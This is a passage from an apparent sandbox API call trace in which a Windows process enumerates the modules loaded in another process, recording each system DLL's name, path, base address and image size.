hProcess=0x214, hModule=0x7fef7af0000, lpmodinfo=0x2567180, cb=0x18 | out: lpmodinfo=0x2567180*(lpBaseOfDll=0x7fef7af0000, SizeOfImage=0xc000, EntryPoint=0x7fef7af1070)) returned 1 [0067.982] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.982] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7af0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CSCDLL.dll") returned 0xa [0067.987] CoTaskMemFree (pv=0xd910e0) [0067.987] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.987] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7af0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CSCDLL.dll" (normalized: "c:\\windows\\system32\\cscdll.dll")) returned 0x1e [0067.991] CoTaskMemFree (pv=0xd910e0) [0067.991] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb0e0000, lpmodinfo=0x2569358, cb=0x18 | out: lpmodinfo=0x2569358*(lpBaseOfDll=0x7fefb0e0000, SizeOfImage=0xf000, EntryPoint=0x7fefb0e1040)) returned 1 [0067.995] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.995] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb0e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CSCAPI.dll") returned 0xa [0067.999] CoTaskMemFree (pv=0xd910e0) [0067.999] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.999] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb0e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CSCAPI.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")) returned 0x1e [0068.004] CoTaskMemFree (pv=0xd910e0) [0068.004] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7a70000, lpmodinfo=0x256b518, cb=0x18 | out: lpmodinfo=0x256b518*(lpBaseOfDll=0x7fef7a70000, SizeOfImage=0x80000, EntryPoint=0x7fef7a74a8c)) returned 1 [0068.008] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.008] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7a70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntshrui.dll") returned 0xb [0068.012] CoTaskMemFree (pv=0xd910e0) [0068.012] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.012] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7a70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll")) returned 0x1f [0068.016] CoTaskMemFree (pv=0xd910e0) [0068.017] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd570000, lpmodinfo=0x256d6d8, cb=0x18 | out: lpmodinfo=0x256d6d8*(lpBaseOfDll=0x7fefd570000, SizeOfImage=0x23000, EntryPoint=0x7fefd571198)) returned 1 [0068.023] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.023] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd570000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="srvcli.dll") returned 0xa [0068.027] CoTaskMemFree (pv=0xd910e0) [0068.027] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.027] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd570000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")) returned 0x1e [0068.032] CoTaskMemFree (pv=0xd910e0) [0068.032] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7a60000, lpmodinfo=0x256f898, cb=0x18 | out: lpmodinfo=0x256f898*(lpBaseOfDll=0x7fef7a60000, SizeOfImage=0x8000, EntryPoint=0x7fef7a61030)) returned 1 [0068.037] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.037] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7a60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IconCodecService.dll") returned 0x14 [0068.042] CoTaskMemFree (pv=0xd910e0) [0068.042] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.042] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7a60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll")) returned 0x28 [0068.046] CoTaskMemFree (pv=0xd910e0) [0068.046] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x2571a88, cb=0x18 | out: lpmodinfo=0x2571a88*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0068.051] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.051] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0068.056] CoTaskMemFree (pv=0xd910e0) [0068.056] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.056] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0068.060] CoTaskMemFree (pv=0xd910e0) [0068.060] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x2573c48, cb=0x18 | out: lpmodinfo=0x2573c48*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0068.065] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.065] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0068.072] CoTaskMemFree (pv=0xd910e0) [0068.072] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.072] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0068.077] CoTaskMemFree (pv=0xd910e0) [0068.077] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x2575e08, cb=0x18 | out: lpmodinfo=0x2575e08*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0068.081] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.081] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0068.086] CoTaskMemFree (pv=0xd910e0) [0068.086] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.086] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0068.090] CoTaskMemFree (pv=0xd910e0) [0068.090] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9a0000, lpmodinfo=0x2577fd8, cb=0x18 | out: lpmodinfo=0x2577fd8*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0068.095] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.095] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0068.099] CoTaskMemFree (pv=0xd910e0) [0068.100] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.100] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0068.104] CoTaskMemFree (pv=0xd910e0) [0068.104] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9c0000, lpmodinfo=0x257a198, cb=0x18 | out: lpmodinfo=0x257a198*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0068.109] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.109] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0068.114] CoTaskMemFree (pv=0xd910e0) [0068.114] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.114] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0068.119] CoTaskMemFree (pv=0xd910e0) [0068.119] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbd20000, lpmodinfo=0x257c368, cb=0x18 | out: lpmodinfo=0x257c368*(lpBaseOfDll=0x7fefbd20000, SizeOfImage=0x3b000, EntryPoint=0x7fefbd2f410)) returned 1 [0068.123] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.123] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbd20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SndVolSSO.DLL") returned 0xd [0068.128] CoTaskMemFree (pv=0xd910e0) [0068.128] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.128] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbd20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SndVolSSO.DLL" (normalized: "c:\\windows\\system32\\sndvolsso.dll")) returned 0x21 [0068.133] CoTaskMemFree (pv=0xd910e0) [0068.133] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbd10000, lpmodinfo=0x257e538, cb=0x18 | out: lpmodinfo=0x257e538*(lpBaseOfDll=0x7fefbd10000, SizeOfImage=0xb000, EntryPoint=0x7fefbd11020)) returned 1 [0068.137] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.137] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbd10000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="HID.DLL") returned 0x7 [0068.144] CoTaskMemFree (pv=0xd910e0) [0068.144] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.144] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbd10000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\HID.DLL" (normalized: "c:\\windows\\system32\\hid.dll")) returned 0x1b [0068.149] CoTaskMemFree (pv=0xd910e0) [0068.149] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbcc0000, lpmodinfo=0x25806e8, cb=0x18 | out: lpmodinfo=0x25806e8*(lpBaseOfDll=0x7fefbcc0000, SizeOfImage=0x4b000, EntryPoint=0x7fefbccefcc)) returned 1 [0068.154] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.154] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbcc0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MMDevApi.dll") returned 0xc [0068.158] CoTaskMemFree (pv=0xd910e0) [0068.158] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.158] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbcc0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\MMDevApi.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll")) returned 0x20 [0068.165] CoTaskMemFree (pv=0xd910e0) [0068.165] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef76f0000, lpmodinfo=0x25828b8, cb=0x18 | out: lpmodinfo=0x25828b8*(lpBaseOfDll=0x7fef76f0000, SizeOfImage=0x83000, EntryPoint=0x7fef771692c)) returned 1 [0068.169] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.169] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef76f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="timedate.cpl") returned 0xc [0068.174] CoTaskMemFree (pv=0xd910e0) [0068.174] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.174] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef76f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl")) returned 0x20 [0068.179] CoTaskMemFree (pv=0xd910e0) [0068.179] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb350000, lpmodinfo=0x2584a88, cb=0x18 | out: lpmodinfo=0x2584a88*(lpBaseOfDll=0x7fefb350000, SizeOfImage=0x19000, EntryPoint=0x7fefb3511a8)) returned 1 [0068.184] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.184] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ATL.DLL") returned 0x7 [0068.189] CoTaskMemFree (pv=0xd910e0) [0068.189] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.189] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ATL.DLL" (normalized: "c:\\windows\\system32\\atl.dll")) returned 0x1b [0068.199] CoTaskMemFree (pv=0xd910e0) [0068.199] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7600000, lpmodinfo=0x2586c38, cb=0x18 | out: lpmodinfo=0x2586c38*(lpBaseOfDll=0x7fef7600000, SizeOfImage=0xee000, EntryPoint=0x7fef76012a0)) returned 1 [0068.204] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.204] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7600000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="actxprxy.dll") returned 0xc [0068.209] CoTaskMemFree (pv=0xd910e0) [0068.209] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.209] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7600000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")) returned 0x20 [0068.214] CoTaskMemFree (pv=0xd910e0) [0068.214] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb800000, lpmodinfo=0x2588e08, cb=0x18 | out: lpmodinfo=0x2588e08*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0068.219] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.219] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb800000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0068.224] CoTaskMemFree (pv=0xd910e0) [0068.224] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.224] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb800000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0068.229] CoTaskMemFree (pv=0xd910e0) [0068.229] GetModuleInformation (in: hProcess=0x214, hModule=0x7feffae0000, lpmodinfo=0x258afc8, cb=0x18 | out: lpmodinfo=0x258afc8*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0068.234] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.234] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feffae0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0068.239] CoTaskMemFree (pv=0xd910e0) [0068.239] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.239] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feffae0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0068.244] CoTaskMemFree (pv=0xd910e0) [0068.244] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb200000, lpmodinfo=0x258d1a0, cb=0x18 | out: lpmodinfo=0x258d1a0*(lpBaseOfDll=0x7fefb200000, SizeOfImage=0x34000, EntryPoint=0x7fefb201890)) returned 1 [0068.250] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.250] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb200000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="shdocvw.dll") returned 0xb [0068.256] CoTaskMemFree (pv=0xd910e0) [0068.256] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.256] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb200000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll")) returned 0x1f [0068.261] CoTaskMemFree (pv=0xd910e0) [0068.261] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb1f0000, lpmodinfo=0x258f360, cb=0x18 | out: lpmodinfo=0x258f360*(lpBaseOfDll=0x7fefb1f0000, SizeOfImage=0xc000, EntryPoint=0x7fefb1f1380)) returned 1 [0068.266] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.266] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb1f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LINKINFO.dll") returned 0xc [0068.281] CoTaskMemFree (pv=0xd910e0) [0068.281] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.281] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb1f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LINKINFO.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll")) returned 0x20 [0068.294] CoTaskMemFree (pv=0xd910e0) [0068.294] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb20000, lpmodinfo=0x2591530, cb=0x18 | out: lpmodinfo=0x2591530*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0068.305] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.305] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0068.312] CoTaskMemFree (pv=0xd910e0) [0068.312] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.312] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0068.319] CoTaskMemFree (pv=0xd910e0) [0068.319] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc280000, lpmodinfo=0x25936f0, cb=0x18 | out: lpmodinfo=0x25936f0*(lpBaseOfDll=0x7fefc280000, SizeOfImage=0x24000, EntryPoint=0x7fefc281024)) returned 1 [0068.325] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.325] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc280000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="shacct.dll") returned 0xa [0068.331] CoTaskMemFree (pv=0xd910e0) [0068.331] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.331] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc280000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")) returned 0x1e [0068.338] CoTaskMemFree (pv=0xd910e0) [0068.338] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc260000, lpmodinfo=0x25958b0, cb=0x18 | out: lpmodinfo=0x25958b0*(lpBaseOfDll=0x7fefc260000, SizeOfImage=0x1d000, EntryPoint=0x7fefc261ef4)) returned 1 [0068.344] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.344] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SAMLIB.dll") returned 0xa [0068.351] CoTaskMemFree (pv=0xd910e0) [0068.351] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.351] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SAMLIB.dll" (normalized: "c:\\windows\\system32\\samlib.dll")) returned 0x1e [0068.357] CoTaskMemFree (pv=0xd910e0) [0068.357] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb980000, lpmodinfo=0x2597a70, cb=0x18 | out: lpmodinfo=0x2597a70*(lpBaseOfDll=0x7fefb980000, SizeOfImage=0x14000, EntryPoint=0x7fefb9816b4)) returned 1 [0068.366] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.366] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="samcli.dll") returned 0xa [0068.372] CoTaskMemFree (pv=0xd910e0) [0068.373] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.373] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")) returned 0x1e [0068.379] CoTaskMemFree (pv=0xd910e0) [0068.379] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb1b0000, lpmodinfo=0x2599c30, cb=0x18 | out: lpmodinfo=0x2599c30*(lpBaseOfDll=0x7fefb1b0000, SizeOfImage=0x3b000, EntryPoint=0x7fefb1b1070)) returned 1 [0068.386] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.386] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb1b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msls31.dll") returned 0xa [0068.392] CoTaskMemFree (pv=0xd910e0) [0068.392] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.392] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb1b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll")) returned 0x1e [0068.399] CoTaskMemFree (pv=0xd910e0) [0068.399] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef74b0000, lpmodinfo=0x259bdf0, cb=0x18 | out: lpmodinfo=0x259bdf0*(lpBaseOfDll=0x7fef74b0000, SizeOfImage=0x7f000, EntryPoint=0x7fef750385c)) returned 1 [0068.405] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.405] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef74b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="tiptsf.dll") returned 0xa [0068.412] CoTaskMemFree (pv=0xd910e0) [0068.412] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.412] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef74b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll")) returned 0x3d [0068.419] CoTaskMemFree (pv=0xd910e0) [0068.419] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc5c0000, lpmodinfo=0x259dff0, cb=0x18 | out: lpmodinfo=0x259dff0*(lpBaseOfDll=0x7fefc5c0000, SizeOfImage=0x1da000, EntryPoint=0x7fefc5c3130)) returned 1 [0068.425] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.425] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc5c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="authui.dll") returned 0xa [0068.432] CoTaskMemFree (pv=0xd910e0) [0068.432] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.432] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc5c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll")) returned 0x1e [0068.438] CoTaskMemFree (pv=0xd910e0) [0068.438] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc4b0000, lpmodinfo=0x25a01b0, cb=0x18 | out: lpmodinfo=0x25a01b0*(lpBaseOfDll=0x7fefc4b0000, SizeOfImage=0x10a000, EntryPoint=0x7fefc4b1010)) returned 1 [0068.445] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.445] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc4b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTUI.dll") returned 0xb [0068.452] CoTaskMemFree (pv=0xd910e0) [0068.452] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.452] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc4b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTUI.dll" (normalized: "c:\\windows\\system32\\cryptui.dll")) returned 0x1f [0068.459] CoTaskMemFree (pv=0xd910e0) [0068.459] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7200000, lpmodinfo=0x25a2388, cb=0x18 | out: lpmodinfo=0x25a2388*(lpBaseOfDll=0x7fef7200000, SizeOfImage=0x2a3000, EntryPoint=0x7fef7203498)) returned 1 [0068.465] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.465] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7200000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="gameux.dll") returned 0xa [0068.474] CoTaskMemFree (pv=0xd910e0) [0068.474] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.475] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7200000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll")) returned 0x1e [0068.482] CoTaskMemFree (pv=0xd910e0) [0068.482] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbc60000, lpmodinfo=0x25a4548, cb=0x18 | out: lpmodinfo=0x25a4548*(lpBaseOfDll=0x7fefbc60000, SizeOfImage=0x35000, EntryPoint=0x7fefbc61064)) returned 1 [0068.489] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.489] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbc60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="XmlLite.dll") returned 0xb [0068.498] CoTaskMemFree (pv=0xd910e0) [0068.498] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.498] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbc60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\XmlLite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")) returned 0x1f [0068.506] CoTaskMemFree (pv=0xd910e0) [0068.506] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef93a0000, lpmodinfo=0x25a6708, cb=0x18 | out: lpmodinfo=0x25a6708*(lpBaseOfDll=0x7fef93a0000, SizeOfImage=0x7c000, EntryPoint=0x7fef93a11d4)) returned 1 [0068.512] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.512] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef93a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wer.dll") returned 0x7 [0068.519] CoTaskMemFree (pv=0xd910e0) [0068.520] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0068.520] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef93a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")) returned 0x1b [0068.526] CoTaskMemFree (pv=0xd910e0) [0068.526] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb1a0000, lpmodinfo=0x25a88b8, cb=0x18 | out: lpmodinfo=0x25a88b8*(lpBaseOfDll=0x7fefb1a0000, SizeOfImage=0x9000, EntryPoint=0x7fefb1a35c0)) returned 1 [0068.533] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 